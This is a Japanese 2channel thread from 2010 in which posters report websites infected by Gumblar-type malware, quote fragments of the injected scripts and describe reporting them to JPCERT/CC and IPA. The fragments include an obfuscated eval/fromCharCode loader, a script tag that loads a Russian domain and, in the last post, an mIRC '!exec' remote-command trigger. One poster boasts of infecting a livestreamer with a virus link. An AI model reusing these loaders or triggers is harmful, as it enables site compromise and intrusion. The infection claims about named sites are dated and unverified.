10/11/15 22:38:55
取扱注意

>TIA及び当羽田空港支店はフライトシミュレータ上の架空航空会社(VA)であります。
f45●aaa●livedoor●jp/~haneda/
→tour1●htm
→staff1●htm
他にも・・・

・がんぶらー
・8080
・<script>var XepaZerc=
・<script>function ~
・fff.op.replace (468)
・がんぶらーっぽいの(最下部)


538:/名無しさん[1-30] ◆.htmlint.U
10/11/16 01:07:34
>>537
とりぷるあにつーほ。

539:名無しさん@お腹いっぱい。
10/11/20 16:32:39
aguseのトップページ真っ白なんだけどなんかあったん?


540:名無しさん@お腹いっぱい。
10/11/21 22:45:04
鯖落ちだろ

541:名無しさん@お腹いっぱい。
10/11/22 17:51:21
www●isumiskyhotel●com/
こんなに沢山入っているホテルというのもね。
こんなところに止まったら個人情報心配

542:名無しさん@お腹いっぱい。
10/11/22 19:41:01
>>541
>>541
これは悪質ですね。絞り込んでいませんが、、、
File name: www.isumiskyhotel.com.txt Submission date: 2010-11-22 09:19:37 (UTC) Result: 27/ 42 (64.3%)
URLリンク(www.virustotal.com)

URLリンク(maps.google.co.jp)
9B%E3%83%86%E3%83%AB&fb=1&gl=jp&hq=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%
AB&hnear=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%AB&cid=10998837259304234162
電凸してみました。

「ごつごうかけているところはございません」
「大丈夫ですよ」 だそうです。

意味が分かりません。対応終了。

543:名無しさん@お腹いっぱい。
10/11/22 20:15:32
>>541
                                                     / ,. -―- 、 l   〃
  ┏┓  ┏━┓┏━┓    ┏┓  ┏┳┓              //: : : : !\:_:|:_: \/ハ              ┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛    ┏┓     〃: : :!、: : :|/∨ヘ : : !ヽ|              ┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓  ┃┃┏━ f: : |斗-\| '下ハミV h: :! .━━┓  ┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛  ┗┛┃┃  ┃┃  ┃┃┃   |: : ハ      マり |: :リ、: \ .       ┃  ┃┃┃┃
┗┓┏┛┗┛┃┃  ┃┃        ┃┃  ┗┛┏┛┃┗━ lハハい == , . へ   |: :l: 、\: \ __━┛  ┗┛┗┛
  ┃┃      ┃┃┏┛┃      ┏┛┃  ┏━┛┏┛        }ハ   く{  }/|: :|\\\: : : : `\  .┏┓┏┓
  ┗┛      ┗┛┗━┛      ┗━┛  ┗━┛        /;|: |>r--rf  |: :l- 、\\\ ̄`\\┗┛┗┛

544:名無しさん@お腹いっぱい。
10/11/23 00:10:30
>>541
警察に通報したほうが良いと思ふ。

545:名無しさん@お腹いっぱい。
10/11/23 12:16:13
この手の注意を営業妨害だと逆ギレするのが珍しくないくらいのキチガイ業界だからな。

546:名無しさん@お腹いっぱい。
10/11/23 19:27:02
何が悪いのかわからない奴に説明するのはほんと難しいよ

547:/名無しさん[1-30] ◆.htmlint.U
10/11/23 21:38:28
>>541-542
おつぅ。
おしんにメル。

548:名無しさん@お腹いっぱい。
10/11/24 20:44:44
shop-pro●jp/
通販サイトだが
グーグルのセーフブラウジングによると怪しい


549:名無しさん@お腹いっぱい。
10/11/24 21:57:15
>>548
んー今は警告でてないようですが
「最後に検出されたのは2010-09-21」となってて時間が立ちすぎとる
***.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?

550:名無しさん@お腹いっぱい。
10/11/24 22:12:59
ヒント:新手のアフィ

551:548
10/11/25 00:19:36
>>549
気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん

>>550
他のサイトへのリンク先がやられた可能性もあるな

552:名無しさん@お腹いっぱい。
10/11/25 09:29:31
Windowsに未修正の脆弱性か、権限昇格の恐れ
URLリンク(www.itmedia.co.jp)

553:名無しさん@お腹いっぱい。
10/11/25 13:07:24
>>548-551
初心者の意見ですみません
私は通販をよく利用するのですが
例えば「***.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね?

554:名無しさん@お腹いっぱい。
10/11/25 13:51:12
>>553
特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない

通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです

555:名無しさん@お腹いっぱい。
10/11/25 14:05:52
>>553
個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ

556:名無しさん@お腹いっぱい。
10/11/25 16:58:26
>>552
>悪用はローカルでのみ可能

557:名無しさん@お腹いっぱい。
10/11/25 19:16:29
>>549
少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな?
とにかく杜撰な管理が多いな

558:名無しさん@お腹いっぱい。
10/11/25 19:40:09
URLリンク(blog-imgs-45-origin.fc2.com)

559:名無しさん@お腹いっぱい。
10/11/26 11:33:56
電話用サイトだが、いちおう
shiprip●com/sponge/bob/i/index●html
→<script>var NehQen=
→<script>function aY

新型っぽいの
<script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=ga.rfromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2・・・・・中略・・・・・))</script>
※装填されてるサイトのURLは非公開とす

560:名無しさん@お腹いっぱい。
10/11/26 11:58:27
>>548
たぶんここだぬ
izu-shizen●shop-pro●jp/

ここ見ればわかるんじゃね?
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中w

561:名無しさん@お腹いっぱい。
10/11/26 14:26:12
会社にメールしてもISPにメールしても対処しない会社
satokk●co●jp
criminal●co●jp Gumblar.X
motif●jp
www●la-palmedor●com/patis-shop●html  Gumblar.X

ここなんかは、お薬さんスパムのリダイレクトページがある
i-medical●co●jp/ration73●html

562:/名無しさん[1-30] ◆.htmlint.U
10/11/26 16:51:56
>>561
おしん…

作業に入るお。。。

563:名無しさん@お腹いっぱい。
10/11/26 17:41:16
www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
www●ando-kagu●com
www●fairwayinc●jp
www●heisei-tech●com
tensou●daishin-inc●jp
www●100yen●co●jp
interior-myhouse●com
royal-cbj●jp
www●ltsgo●co●jp
matsuri●co●jp
www●yamaharu-tosou●co●jp
www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視


564:/名無しさん[1-30] ◆.htmlint.U
10/11/26 19:27:18
>>561
さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構(IPA)セキュリティセンター(ISEC)につーほ。

>>563
うげげ、目が逝っちゃうお。。。

565:名無しさん@お腹いっぱい。
10/11/26 22:03:29
Gumblarじゃないけど、2chにXSS脆弱性が発覚
スレリンク(operate板:859番)

でも、Vista+IE8だと、IEがXSSを検出してスクリプトの動作を制限するので影響うけず
IE7以下やFirefixだとアウト?

566:名無しさん@お腹いっぱい。
10/11/27 20:03:34
>>541は表示されなくなってるね

567:/名無しさん[1-30] ◆.htmlint.U
10/11/29 02:20:43
>>561
一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。

568:bcc
10/11/29 16:32:04 BE:702028962-2BP(1234)
www●rctank●jpはまだ感染放置かよ

569:名無しさん@お腹いっぱい。
10/11/29 16:56:27
ドムスで商品を注文しようという方はご注意ください!
www*geocities*jp/feb1710/index*html
====
こんな書き込みもあるくらいだから本人は何もしないのでしょう。
デジロックでなければ、こんなサイトは表示停止にしてもらえる
のだが。。。。

570:名無しさん@お腹いっぱい。
10/12/01 00:46:22
Windowsにシステム権限を奪取される脆弱性--すでに攻撃も確認
URLリンク(japan.cnet.com)

Microsoft Windows のRtlQueryRegistryValues() 関数におけるレジストリデータ検証不備の脆弱性
URLリンク(jvn.jp)
>2010年11月29日現在、対策方法はありません。

どうすんだよこれwww

571:名無しさん@お腹いっぱい。
10/12/01 02:21:22
COMODOとかSSMとかで対象のレジストリキーを監視するようにすればよかろう。

572:名無しさん@お腹いっぱい。
10/12/01 08:07:18
Malware Defenderでもいいな

573:名無しさん@お腹いっぱい。
10/12/01 11:23:15
理屈だけの妄言で対処ですかw

574:名無しさん@お腹いっぱい。
10/12/01 11:30:52
↑何も出来ない奴

575:名無しさん@お腹いっぱい。
10/12/01 13:52:52
よくわかんない!悔しい!とりあえず煽っとけ!

…ってことだろw

576:名無しさん@お腹いっぱい。
10/12/01 20:21:59
マスターペニス

577:名無しさん@お腹いっぱい。
10/12/01 23:29:54
java&Flashきればおk、なんて利便性を大きく損なうアホな対策法に比べりゃ
キー監視なんてまだ有情だな

578:名無しさん@お腹いっぱい。
10/12/01 23:30:44
すまんageた
巻き添え規制が長かったもんで・・・

579:名無しさん@お腹いっぱい。
10/12/02 02:37:51
専ブラ使いましょうや

580:名無しさん@お腹いっぱい。
10/12/03 03:10:39
取扱注意

ダイワ包材株式会社
www●daiwa-pf●co●jp/

<script>var QaSehalo=2
<script>function aY


581:/名無しさん[1-30] ◆.htmlint.U
10/12/03 05:00:36
おしんつづくなぁ。。。

>>580
おちゅ。
そこのメアドと鯖缶とおしんとJPCERT/CCとIPAとNTT-CERTにつーほ。

582:/名無しさん[1-30] ◆.htmlint.U
10/12/03 05:50:49
あぁ、「index●html」、「index●htm」、「newpage」とか13ページのほかに
サイト内検索したら、まだいぱーいあたぁ。。。orz.....

583:名無しさん@お腹いっぱい。
10/12/03 15:51:21
取扱注意

絶賛放置中につき再掲載
www●snowfan-mimo●com/area/area-service●asp?sID=500 など

絶賛放置中なゴミサイトは消滅すべき

584:名無しさん@お腹いっぱい。
10/12/03 22:23:52
久々にyoutubeをセーフブラウジングでチェックしたらなんかあるみたいだな
あれはyoutubeの広告のリンク先のサイトでもやられたのか?

585:名無しさん@お腹いっぱい。
10/12/03 22:34:30
URLリンク(www.smilebanana.com)

586:名無しさん@お腹いっぱい。
10/12/04 01:13:06
FirefoxはAdblock Plusに「URLリンク(*.pdf)」を放り込んでおけば良い
ゴミだけ蹴って、自分自身でアクセスするものは通してくれるから便利だぞ

587:名無しさん@お腹いっぱい。
10/12/04 10:04:02
>>584
それは初心者の質問スレで聞いた方がよくね?

588:名無しさん@お腹いっぱい。
10/12/05 11:13:06
ここに書くんだからgumbler関係だろう
それを初心者池で蹴るのはこのスレの用途の否定じゃないか?

589:名無しさん@お腹いっぱい。
10/12/05 18:31:05
取扱注意
www48●tok2●com/home/karawasuichi/

・Jsunpack
5f6ec9a74fc14cb25efe818a81cfb9605bda288c

「download●XXXXX●jp/」
※腹筋注意w

590:名無しさん@お腹いっぱい。
10/12/06 19:35:19 BE:351014832-2BP(538)
>>589 上 tok2につーほー
    下 既にドメインパーキングのような

591:名無しさん@お腹いっぱい。
10/12/06 21:56:28
取扱注意

株式会社 電研端子製作所
www●denken-t●co●jp/eng/qa/qa●asp
※初代(?)Gumblar

日本一の幼稚園 日本一の子育てを応援する津久井幼稚園
www●tkg1152●sakura●ne●jp/photo/200709/070907/img13●html
※初代(?)Gumblar



592:名無しさん@お腹いっぱい。
10/12/07 00:17:35 BE:2047584375-2BP(538)
>>591 上 反応なし
   下 反応なし

593:/名無しさん[1-30] ◆.htmlint.U
10/12/07 07:58:39
>>591
乙です。
それぞれつーほしますた。

594:名無しさん@お腹いっぱい。
10/12/07 15:36:54
>>593 過去分も含めて 乙乙

取扱注意
>顛峰グループ(Sofmit Group)は~~中略~~中国西部においてソフトウェアアウトソーシング業界No.1の企業です。
・求人情報
en●sofmit●com/jp/Career/DetailsSub●aspx

<script src=http://www●errghr●ru/script●js></script>
ウイルスバスターと同じく、下から数えてNo.1ということですねw


>エクセルテンプレート・ワードテンプレート無料ダウンロード
www4●atpages●jp/kaisya/
※旧8080(難読化)
感染率の高い企業のザルPCを「無料」というエサで釣ってトロイ(無料)をバラ撒いてたのかw



どーでも良いけど、禿の検索エンジンが帝國のやつになったら探しにくくなたーよ orz


595:/名無しさん[1-30] ◆.htmlint.U
10/12/07 22:02:39
>>594

上:こちらの環境ではメルが戻ってきます。JPCERT/CCとIPAに気体
下:atpagesとかにつーほ。

596:名無しさん@お腹いっぱい。
10/12/08 23:20:04
URLリンク(ameblo.jp)
さすが「ろりぽ」というとこでしょうかね?

597:名無しさん@お腹いっぱい。
10/12/09 20:47:25
マスターペニス

598:名無しさん@お腹いっぱい。
10/12/11 10:12:37
今更かも知れないが
>>5のテンプレに
これも加えようぜ
Exploit - AVG
URLリンク(linkscanner.explabs.com)


599:名無しさん@お腹いっぱい。
10/12/11 11:47:58
URLリンク(bcc.dip.jp)
URLリンク(x68000.q-e-d.net)
こんなのもあるね

600:名無しさん@お腹いっぱい。
10/12/11 19:14:38
firefoxのABPは
ここの対策も有効か
URLリンク(ponco2garage.blog111.fc2.com)

601:名無しさん@お腹いっぱい。
10/12/11 21:21:29
>>600
2ヶ月くらい寝てたのか?
冬眠するにゃ早過ぎるような気がするが・・

今現在は、どっかのサーバー(特に広告関連)をハクってばら撒くのが主流だから
確実に防ぐ方法というものは存在しない。


どうしてもADPで防ぎたいならURLリンク(*) ←これを入れておけよw
「驚きの白さ」

602:名無しさん@お腹いっぱい。
10/12/12 02:16:00
そういえばmicroadの広告があるサイトを見たら感染したなんて話も前にあったなw

603:名無しさん@お腹いっぱい。
10/12/12 03:40:41
それも>>2-3をきちんとしていれば問題なかったはず。

604:名無しさん@お腹いっぱい。
10/12/12 09:30:41
心配ならadっぽいアドレスをカットしておけよ

605:名無しさん@お腹いっぱい。
10/12/12 10:13:54
>QuickTime 7.6.9
このバージョンじゃないけど、ぜいじゃく性を悪用する処理を
積んだExploitKitが存在するから、入れてるPCは更新必須

>>600
1月に書かれた記事でもう古くて不完全な情報だよん

AdBlockは単に"軽減"という程度のレベル
改竄されるのは何も広告だけでないし
範囲も限定的で、たとえばメールとかIM経由なら出る幕がなし

基本的な対策は>>2-3
これ以上もこれ以下もないん (ゼロデイ攻撃は除く)

606:名無しさん@お腹いっぱい。
10/12/12 19:33:01
とりあえずどっかのサイト行く前に必ずセーフブラウジングに掛ける癖を付ければ良いんじゃないかな

607:名無しさん@お腹いっぱい。
10/12/12 22:54:55
>>606
そんな面倒な事するくらいならGoogle Chrome使えよw

608:名無しさん@お腹いっぱい。
10/12/12 23:01:21
そんなのじゃ無理
Secure Browserが良いよ

609:名無しさん@お腹いっぱい。
10/12/12 23:14:12
>>606
そのセーフブラウジングも「Google は過去 90 日の間、このサイトを巡回していません。」
という場合があるよなw

やっぱりこの場合はは危険かどうかわからないってことなのかな?


610:名無しさん@お腹いっぱい。
10/12/13 16:05:23
OCNからメールが。
自分のWEBサイトがガンブラーに感染してると。
調べてみたらひとつ怪しいファイルがあったので削除。
Windowsのアップデート~adobe関係までアップデート。
ウイルスソフトでウイルスチェック。
WEBホストのパスワードをすべて変更。

嫌気が刺したんで他のWEBアカウントデータもすべてホスト側から削除。

これでよろしいでしょうか?

611:名無しさん@お腹いっぱい。
10/12/13 16:30:44
webサイトを閉じる。
PCリカバリ。

612:名無しさん@お腹いっぱい。
10/12/13 16:43:03
>>610
> 調べてみたらひとつ怪しいファイルがあったので削除。
このファイルはどうやって持ち込まれたと思ってるの?
それに対する対策はしたの?

613:名無しさん@お腹いっぱい。
10/12/13 17:10:58
クリーンインスコした方が…

614:名無しさん@お腹いっぱい。
10/12/13 17:59:35
>>611
サイトは自分のPCが完全にクリーンな状態になるまで完全閉鎖

感染が疑われるPCは、HDを他のPCに繋いで検査すること
他のPC~ができないなら迷わずリカバリ

PCがキレイになったら、>>2-3を実施(ずっと継続する)+パスワード変更とか・・

サイトのトップページに【お詫び】を掲載
※閲覧者に対して、感染の有無の確認(ウイルススキャン)をお願いする


615:名無しさん@お腹いっぱい。
10/12/13 18:06:19
>>610
早くHP閉鎖しろカス!!!!!!!!!!!1

616:名無しさん@お腹いっぱい。
10/12/13 18:06:34
>>610
HTMLファイルは手元のファイルとサーバー側で変更がないかちゃんと確認した?
Javaランタイムはアップデートした?
他のすべてのインストールソフトに対してアップデートを確認した?
OSわからんけどWindowsUpdateじゃなくMicrosoftUpdateでやった?
Webアカウントにはフリーメールも含まれてるわけだけどそのへんもパス変えた?
LAN内に他にPCはないの?

ウイルスでウイルスチェックしても意味ないよ
セキュリティ対策ソフトが入ってるなら期限が切れてないことが大前提

617:名無しさん@お腹いっぱい。
10/12/13 19:18:18 BE:1170048454-PLT(18051)
情弱の不幸でメシウマ

618:名無しさん@お腹いっぱい。
10/12/13 20:59:06
ガンブラーに感染しちゃったら、上の方にあった対処法に従ってやるんだろうけど
クリーンインストールやってもだめなんじゃないの?

Cドライブにシステム、データ他はパーティション切るか
別ドライブで「D」以降にって人が多いと思うけど
システムドライブだけきれいになっても
データドライブにWEBのファイルがある人は、
そのドライブに改鼠されたデータが残ってたらどうなるの?

619:名無しさん@お腹いっぱい。
10/12/13 21:40:50 BE:3744154188-PLT(18051)
毎回再インストール
これ最強 しかしHDDがそのうち物故割れるという諸刃の刃

620:名無しさん@お腹いっぱい。
10/12/13 23:26:33
>>618
サーバー側のデータをFTP経由で改竄してるだけだよ
もしローカル側のデータを改ざんされたとしてもそれはバージョン管理ソフトや
バックアップとの差分を見ればわかるとおもう
そういうのがないなら入念に確認して下さいとしかいえん

万が一改ざんデータがローカルに残っててもそれだけではどうにもならない
アップロードされ直してその後も動く状況なら被害者が増えるだけ

>>619
そういうの関係なく壊れるときは壊れます

621:名無しさん@お腹いっぱい。
10/12/14 01:52:43
まだ個人のブログなら改ざんされても見ている人からも報告があるだけ良いな
企業のサイトなんかは連絡しても「何それ?」って返ってくるし

622:名無しさん@お腹いっぱい。
10/12/14 07:40:08
>>620
ローカル保存のHTMLも改竄って記憶があるんだけど、これじゃなかった?

623:名無しさん@お腹いっぱい。
10/12/14 17:35:27
>>610
うーん、できれば感染していた時のaguseの結果が見たかった

624:名無しさん@お腹いっぱい。
10/12/16 13:26:08
マスターペニス

625:名無しさん@お腹いっぱい。
10/12/16 15:51:32
詳しくことはよくわからないけど
puredress●com

626:名無しさん@お腹いっぱい。
10/12/18 21:33:53 BE:2457101276-PLT(18051)
URLリンク(www.zilbe.com)
ニュー速運用情報から http://抜きだとエラー

627:名無しさん@お腹いっぱい。
10/12/19 01:01:26
これ良いなw

プロセルピナ・プロジェクト
URLリンク(www.traceability-center.com)
試用版=無期限(一部機能に制限あり)

「プロセルピナ」のAntiAd機能をテストするためのテストページ
URLリンク(sound.jp)

628:名無しさん@お腹いっぱい。
10/12/20 13:09:26
Google、改ざんされた疑いのあるページに検索結果で警告表示
URLリンク(internet.watch.impress.co.jp)

629:名無しさん@お腹いっぱい。
10/12/22 03:21:03
マスターペニス

630:名無しさん@お腹いっぱい。
10/12/22 20:38:22
今youtubeをaguseで見る限りヤバくね?
s0.2mdn●net/879366/flashwright_1_2●js
という奴が見つかるのだが

631:名無しさん@お腹いっぱい。
10/12/22 20:41:09
間違えた、訂正します
s0.2mdn●net/879366/flashwriht_1_2●js

632:名無しさん@お腹いっぱい。
10/12/22 20:44:28
>>631
404

633:630
10/12/22 21:01:29
度々すまない
また間違えた
aguseで見つかったのはこれです
s0.2mdn●net/879366/flashwrite_1_2●js


634:名無しさん@お腹いっぱい。
10/12/22 21:48:16
>>633
どこがヤバイの?

635:名無しさん@お腹いっぱい。
10/12/22 21:50:06
中身を見てもどこかに飛ばされるようでもないし
VirusTotalでも問題ないようだがな
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)

636:630
10/12/22 21:52:54
>>634
『s0.2mdn.net/879366/flashwrite_1_2.js』でググってみると
なんだか危険そうな雰囲気なんだが…

637:名無しさん@お腹いっぱい。
10/12/22 21:59:35
URL手打ちなんてかわいい

638:名無しさん@お腹いっぱい。
10/12/23 00:28:17
>>630-636
これかにゃ?
URLリンク(forums.liveleak.com)
>well if you are quick and crank up fiddler and check any of the the flash links
listed at the top out then you will note that a script file from http://s0●2mdn●net/879366/flashwrite_1_2●js
is loaded up and this script includes a function called dclkFlashWrite that simply does
a document.write(script string) that redirects to pre-loader.
(以下略

639:名無しさん@お腹いっぱい。
10/12/23 17:59:43
So-netのセキュリティ通信のサイトって無くなった?
数日前に突然消えて、恐くてアクセス出来ない・・

640:名無しさん@お腹いっぱい。
10/12/23 18:02:01
普通に見られるよ。更新中だったりしたんじゃないの?

641:名無しさん@お腹いっぱい。
10/12/23 19:14:20
>>640
ありがと。

642:名無しさん@お腹いっぱい。
10/12/23 23:14:23 BE:1404058346-PLT(20050)
怖くてアクセス出来ないってかわいいな(笑)

643:('д') ◆yUyb3Tqn92
10/12/26 19:59:03
俺様にウィルス踏まされて怒り狂ってる低脳どもざまあだな
そしてこのスレURL晒しながらも悪用厳禁とか書いてる奴は本当に矛盾してて頭悪いな

('д')♪

644:('д') ◆yUyb3Tqn92
10/12/26 19:59:53
いくらネットの法律改正しても
俺様はまだ一度も逮捕されてないお('д^)-☆調子に乗り乗りですお!

645:名無しさん@お腹いっぱい。
10/12/27 11:26:21
相手にされてねえw

646:名無しさん@お腹いっぱい。
10/12/27 16:51:33 BE:585024252-PLT(21152)
VIPに釣りリンク貼ってスクリプトでリモホ抜いたりしたことはあるが
他人にウイルスは踏ませたことがないな

647:名無しさん@お腹いっぱい。
10/12/27 23:36:33
>>645


648:名無しさん@お腹いっぱい。
10/12/28 00:18:04
URLリンク(detail.chiebukuro.yahoo.co.jp)
現在知恵袋では新手の偽セキュリティソフトが大流行していると
各自別IDも総動員して書き込みしてる有名な一派がいるんだけど
ほんとにこいつらがこんなに大騒ぎするようなこと現在起こってるの?


649:名無しさん@お腹いっぱい。
10/12/28 00:48:55
真偽はともかくスレ違いだろ

650:名無しさん@お腹いっぱい。
10/12/28 00:53:25
>>648
そんなリンク見る気にもならないけど実際に発生しているのは事実

651:名無しさん@お腹いっぱい。
10/12/28 11:10:04
>>648
そのグループ回答者たちの各回答見ると「○○さんの~」みたいに自分たちが発見・紹介してる
みたいな記述してるのが笑えるし少し引いたw
各質問に回答してる解決法もいかにも自分たちだけができるみたいな書き方だしw
別にそんな回りくどいやり方殊更偉そうに別IDまだ作って宣伝しなくても
さっさとバックアップしてリカバリすればいいだけの話じゃねぇ?

652:名無しさん@お腹いっぱい。
10/12/28 14:27:21
>>648
何このキチガイ
これ全部一人の自演?

653:名無しさん@お腹いっぱい。
10/12/28 22:34:57
Security Tool から Security Shield になったみたいね

>>648
改行厨にアフィアドレス誘導ワロタ

654:名無しさん@お腹いっぱい。
10/12/28 22:54:59
>>648
何が最敬礼だよ
キモ過ぎる

655:名無しさん@お腹いっぱい。
10/12/29 09:28:08
マスターペニス

656:名無しさん@お腹いっぱい。
10/12/29 11:03:03
MSEに似た偽セキュリティソフトもあるから具体的な名前すら
出さない注意喚起なんてチェーンメールのデマみたいだ。

657:名無しさん@お腹いっぱい。
10/12/29 19:05:43
ttp●//www●mypondstore●com/?q=on-line_scan

aguseでクロ判定

658:名無しさん@お腹いっぱい。
10/12/30 12:02:28
uemura-bokujyo●co●jp

659:名無しさん@お腹いっぱい。
10/12/30 12:17:10
www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
oak-co●net
www●himawarinosato●or●jp
www●soyo-pet●com
www●ltsgo●co●jp
interior-myhouse●com
/royal-cbj●jp
www●paohouse●co●jp
www●yamaharu-tosou●co●jp
motif●jp
satokk●co●jp

660:名無しさん@お腹いっぱい。
10/12/30 20:12:39
>>628
今日知った。google先生さすがだぜ

661:名無しさん@お腹いっぱい。
10/12/31 00:23:52
Gumblar/8080系再始動?
URLリンク(www.google.com)●ru&hl=ja
>Google が最後にこのサイトを巡回したのは2010-12-30で、
このサイトで不審なコンテンツが最後に検出されたのは2010-12-30です。

addonrock●ru/(省略)●jsを突いてみた
日本からのアクセス→まったく繋がらない(IP変えても×、国内の串を通しても×)
海外の串→繋がることがあるがファイルは落ちてこなかった
※2回目以降のアクセスは404

Gumblar(.x/亜種)と同じくGeoIPで国ごと蹴ってるのかね?

662:('д') ◆yUyb3Tqn92
11/01/02 09:28:57
作戦通り♪

663:名無しさん@お腹いっぱい。
11/01/02 10:45:08

('д')FF14のニコ生でブラクラ踏ませてきた
URLリンク(live.nicovideo.jp)

FF14実況中の馬鹿にウィルス入りのブラクラ踏ませた

そのショックで主のPC固まる&主の精神も固まり中

最初は主をフォローしてたリスナーも飽きて他いった

放送の延長(有料)が自動で行われてること判明
つまりPC固まってるのに有料の延長が無駄に使われて生主涙目状態←今ここ


('Д')ざまああああああああああああああああああ!!!!!!
でへへへ、俺様マジGJでしょ(*'д'*)

664:名無しさん@お腹いっぱい。
11/01/02 11:27:23
>>663 死ねよ

665:名無しさん@お腹いっぱい。
11/01/02 12:30:54
やべぇ…これってGumblarじゃないよな?
ウェブメール使おうと今日見たらこんな風に…。

aguseでは反応無かったし、大丈夫だと良いんだが…。

URLリンク(exout.net)

666:名無しさん@お腹いっぱい。
11/01/02 12:46:22
>>663
分かったからコテかBeつけて書き込んでよ

667:名無しさん@お腹いっぱい。
11/01/02 13:02:32
>>663
これを見ていた人はウイルス対策の必要性を思い知っただろうな
いつの日かこのような悪事をはたらいても無意味になることを祈ろう

668:名無しさん@お腹いっぱい。
11/01/02 13:16:59
ニコ動利用するときにはメアド取得必要だし
被害届けとかも出せるんじゃない?例え捨てアカでも

669:名無しさん@お腹いっぱい。
11/01/02 22:36:19
マスターペニス

670:名無しさん@お腹いっぱい。
11/01/02 23:46:55
>>665
>>1読めカス

671:('д') ◆yUyb3Tqn92
11/01/03 03:02:55
('Д')ムハハハハハハハ!
無知が多くて笑えるな(>w<)新年早々上機嫌お☆

672:名無しさん@お腹いっぱい。
11/01/03 04:57:29
>>664>>666-667>>668
ほれ見たことか!
そうやってコテに反応するからまたコテの思い通りになってんだろ!死ね!!!


673:名無しさん@お腹いっぱい。
11/01/03 05:17:51
MSTMP.EXE
とnet-worm.kidoもはやってるよ
ネットワームはkk.zipで駆除できる
URLリンク(support.kaspersky.co.jp)
実はmstmpに感染してたんだ
タスクマネイジャーを起動
プロセスにmstmp.exeを停止
アンチでブート検査、ルート検査を実行

674:名無しさん@お腹いっぱい。
11/01/03 06:46:38
>>673
説明下手だなおい

675:名無しさん@お腹いっぱい。
11/01/03 08:58:41
673みたいにコミュニケーション力が駄目な奴は文章化しても駄目なんだよ
そういう同僚とたまにメールしてるからよくわかる

676:名無しさん@お腹いっぱい。
11/01/03 09:32:52
まあダメな奴ほど自分がダメだって気付かないからな

677:名無しさん@お腹いっぱい。
11/01/03 17:49:19
すごいな
自分の中で勝手に完結しててまったく説明になってない素晴らしい例だ
こういうのって脳の障害じゃないのかな
新年早々良いものを見ることができて感動した

678:('д') ◆yUyb3Tqn92
11/01/03 19:08:58
むしろ、ここでURLの解説してるのって頭が悪い奴ばかりだろ
過去に俺様が指摘したような
悪用厳禁と書きながらhと.だけ外しただけの危険URLひたすら貼ってる馬鹿とか
ウィルス入りサイトのURLを故意に踏ませたら逮捕されるとか思っちゃってる哀れな無知とかな

┐('Д')┌ 偽善者ほど醜いものはねーぜ!
んな中途半端なことしてねーで、どうせなら悪用推薦!って書くようするか、死ね!

679:('д') ◆yUyb3Tqn92
11/01/03 19:18:13
ウィルスといえば
最近、朝起きると
とても高濃度な痰が出る
恐らくウィルスが含まれているのだろう
それを10階のベランダから吐くのがすっかり日課になってる

何が言いたいのかというとだ
俺様はウィルスを踏ませることもあれば降らせることも・・ry

Σ('Д' )\(>w<)ったねぇよ!

680:('д') ◆yUyb3Tqn92
11/01/03 19:19:12
おW
680じゃん
数字の8が大好きおヽ('д')ノおっおW

681:名無しさん@お腹いっぱい。
11/01/04 07:27:52
>>679
やべ・・ちょっと面白いと思っちまったじゃねーか!
高速道路でコンクリート上から落としてきた!って書いたら通報もんだけど
痰の場合はどうなんだろうなwwww

682:名無しさん@お腹いっぱい。
11/01/04 08:21:08
マスターペニス

683:名無しさん@お腹いっぱい。
11/01/04 12:01:28
>>681
たんじゃなく精子だったら通報だろ

684:名無しさん@お腹いっぱい。
11/01/04 17:37:12
こういうクソコテがある日突然音沙汰なくなったりするんだよな
面白いなあ

685:名無しさん@お腹いっぱい。
11/01/04 19:50:16
4 :z:2010/08/28(土) 10:25:02 ID:NtVfNVmU0
452 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:53:49.30 ID:7Cr427LS0
>>440
・プロバイダの新しい有料メールアドレス
・ジャパンネットバンク銀行の使い捨て番号のVISAデビット
ニ.フ.ティ.ーの100円のメアドプラスで認証が通った。
認証できたら、メアドプラスは登録解除してOK。
普通のクレジットカードでは漢字の住所が登録できたが、
ジャパンネットバンク銀行のVISAデビットだとローマ字入力の住所を要求された。

ローマ字の書き方はこれ
ヘボン式ローマ字綴方表
URLリンク(www.seikatubunka.metro.tokyo.jp)

漢字住所でどんな順序でどんなローマ字、番地の番号を使ったかは、
メモ帳でメアド・パスワードと一緒に控えておいたほうがいい。
453 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:55:00.00 ID:t966sYmN0
ローマ字変換
eip=eip+unescape("%u7030%u4300")
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-
URLリンク(www2u.biglobe.ne.jp)
